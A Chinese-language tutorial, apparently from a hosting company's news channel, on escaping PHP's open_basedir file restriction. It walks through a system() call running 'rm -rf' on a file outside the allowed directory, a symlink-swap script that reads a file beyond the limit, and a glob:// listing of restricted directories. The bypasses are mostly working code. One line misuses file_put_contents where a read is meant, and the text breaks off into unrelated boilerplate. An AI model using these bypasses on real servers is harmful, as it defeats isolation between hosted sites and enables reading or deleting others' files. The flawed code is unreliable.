怎么在PHP中繞過open_basedir限制操作文件

怎么在PHP中繞過open_basedir限制操作文件？很多新手對此不是很清楚，為了幫助大家解決這個(gè)難題，下面小編將為大家詳細(xì)講解，有這方面需求的人可以來學(xué)習(xí)下，希望你能有所收獲。

關(guān)于open_basedir

open_basedir是php.ini中的一個(gè)配置選項(xiàng)

它可將用戶訪問文件的活動范圍限制在指定的區(qū)域，

假設(shè)open_basedir=/home/wwwroot/home/web1/:/tmp/，那么通過web1訪問服務(wù)器的用戶就無法獲取服務(wù)器上除了/home/wwwroot/home/web1/和/tmp/這兩個(gè)目錄以外的文件。

注意用open_basedir指定的限制實(shí)際上是前綴,而不是目錄名。

舉例來說: 若"open_basedir = /dir/user", 那么目錄 "/dir/user" 和 "/dir/user1"都是可以訪問的。所以如果要將訪問限制在僅為指定的目錄，請用斜線結(jié)束路徑名。

關(guān)于符號鏈接

符號鏈接又叫軟鏈接,是一類特殊的文件，這個(gè)文件包含了另一個(gè)文件的路徑名(絕對路徑或者相對路徑)。

路徑可以是任意文件或目錄，可以鏈接不同文件系統(tǒng)的文件。在對符號文件進(jìn)行讀或?qū)懖僮鞯臅r(shí)候，系統(tǒng)會自動把該操作轉(zhuǎn)換為對源文件的操作，但刪除鏈接文件時(shí)，系統(tǒng)僅僅刪除鏈接文件，而不刪除源文件本身。

0x01 命令執(zhí)行函數(shù)

由于open_basedir的設(shè)置對system等命令執(zhí)行函數(shù)是無效的，所以我們可以使用命令執(zhí)行函數(shù)來訪問限制目錄。

我們首先創(chuàng)建一個(gè)目錄

/home/puret/test/

且在該目錄下新建一個(gè)1.txt 內(nèi)容為abc

nano 1.txt

再在該目錄下創(chuàng)建一個(gè)目錄命名為b

mkdir b

并且在該目錄下創(chuàng)建一個(gè)1.php文件內(nèi)容為

<?php
  echo file_get_contents("../1.txt");
?>

且在php.ini中設(shè)置好我們的open_basedir

open_basedir = /home/puret/test/b/

我們嘗試執(zhí)行1.php看看open_basedir是否會限制我們的訪問

執(zhí)行效果如圖

很明顯我們無法直接讀取open_basedir所規(guī)定以外的目錄文件。

接下來我們用system函數(shù)嘗試?yán)@open_basedir的限制來刪除1.txt

編輯1.php為

<?php
 system("rm -rf ../1.txt");
?>

先來看看執(zhí)行1.php之前的文件情況

執(zhí)行1.php之后

成功通過命令執(zhí)行函數(shù)繞過open_basedir來刪除文件。
由于命令執(zhí)行函數(shù)一般都會被限制在disable_function當(dāng)中，所以我們需要尋找其他的途徑來繞過限制。

0x02 symlink()函數(shù)

我們先來了解一下symlink函數(shù)

bool symlink ( string $target , string $link )

symlink函數(shù)將建立一個(gè)指向target的名為link的符號鏈接，當(dāng)然一般情況下這個(gè)target是受限于open_basedir的。
由于早期的symlink不支持windows，我的測試環(huán)境就放在Linux下了。

測試的PHP版本是5.3.0，其他的版本大家自測吧。

在Linux環(huán)境下我們可以通過symlink完成一些邏輯上的繞過導(dǎo)致可以跨目錄操作文件。

我們首先在/var/www/html/1.php中 編輯1.php的內(nèi)容為

<?php
  mkdir("c");
  chdir("c");
  mkdir("d");
  chdir("d");
  chdir("..");
  chdir("..");
  symlink("c/d","tmplink");
  symlink("tmplink/../../1.txt","exploit");
  unlink("tmplink");
  mkdir("tmplink");
  echo file_put_contents("http://127.0.0.1/exploit");
?>

接著在/var/www/中新建一個(gè)1.txt文件內(nèi)容為

"abc"

再來設(shè)置一下我們的open_basedir

open_basedir = /var/www/html/

在html目錄下編輯一個(gè)php腳本檢驗(yàn)一下open_basedir

<?php
   file_get_contents("../1.txt");
?>

執(zhí)行看下。

意料之中，文件無法訪問。

我們執(zhí)行剛才寫好的腳本，1.php

可以看到成功讀取到了1.txt的文件內(nèi)容，逃脫了open_basedir的限制

問題的關(guān)鍵就在于

symlink("tmplink/../../1.txt","exploit");

此時(shí)tmplink還是一個(gè)符號鏈接文件，它指向的路徑是c/d，因此exploit指向的路徑就變成了

c/d/../../1.txt

由于這個(gè)路徑在open_basedir的范圍之內(nèi)所以exploit成功建立了。

之后我們刪除tmplink符號鏈接文件再新建一個(gè)同名為tmplink的文件夾，這時(shí)exploit所指向的路徑為

tmplink/../../

由于這時(shí)候tmplink變成了一個(gè)真實(shí)存在的文件夾所以tmplink/../../變成了1.txt所在的目錄即/var/www/

然后再通過訪問符號鏈接文件exploit即可直接讀取到1.txt的文件內(nèi)容

當(dāng)然，針對symlink()只需要將它放入disable_function即可解決問題，所以我們需要尋求更多的方法。

0x03 glob偽協(xié)議

glob是php自5.3.0版本起開始生效的一個(gè)用來篩選目錄的偽協(xié)議，由于它在篩選目錄時(shí)是不受open_basedir的制約的，所以我們可以利用它來繞過限制，我們新建一個(gè)目錄在/var/www/下命名為test

并且在/var/www/html/下新建t.php內(nèi)容為

<?php
  $a = "glob:///var/www/test/*.txt";
  if ( $b = opendir($a) ) {
    while ( ($file = readdir($b)) !== false ) {
      echo "filename:".$file."\n";
    }
    closedir($b);
  }
?>

執(zhí)行結(jié)果如圖：

php是什么語言

php，一個(gè)嵌套的縮寫名稱，是英文超級文本預(yù)處理語言（PHP:Hypertext Preprocessor）的縮寫。PHP 是一種 HTML 內(nèi)嵌式的語言，PHP與微軟的ASP頗有幾分相似，都是一種在服務(wù)器端執(zhí)行的嵌入HTML文檔的腳本語言，語言的風(fēng)格有類似于C語言，現(xiàn)在被很多的網(wǎng)站編程人員廣泛的運(yùn)用。

看完上述內(nèi)容是否對您有幫助呢？如果還想對相關(guān)知識有進(jìn)一步的了解或閱讀更多相關(guān)文章，請關(guān)注億速云行業(yè)資訊頻道，感謝您對億速云的支持。